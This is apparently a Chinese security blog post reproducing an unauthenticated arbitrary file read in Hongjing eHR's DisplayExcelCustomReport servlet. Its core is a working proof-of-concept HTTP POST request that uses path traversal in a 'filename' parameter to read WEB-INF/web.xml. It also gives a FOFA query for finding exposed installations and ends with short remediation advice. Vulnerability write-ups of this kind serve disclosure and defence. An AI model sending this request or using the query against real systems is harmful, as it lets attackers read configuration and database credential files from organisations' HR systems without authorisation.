宏景eHR DisplayExcelCustomReport 任意文件读取漏洞复现
站长 • 2024-02-29 04:56 • 123 次点击 • 技术文章
0x01 产品简介
宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。
0x02 漏洞概述
宏景eHR DisplayExcelCustomReport接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
0x03 复现环境
FOFA:app="HJSOFT-HCM"
0x04 漏洞复现
PoC
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1Host: your-ipUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Content-Type: application/x-www-form-urlencoded filename=../webapps/ROOT/WEB-INF/web.xml
读取web.xml
0x05 修复建议
关闭互联网暴露面或接口设置访问权限
目前软件已发布安全修复更新,受影响用户可以联系厂商获取补丁。
推荐阅读:
扫描二维码,在手机上阅读
收藏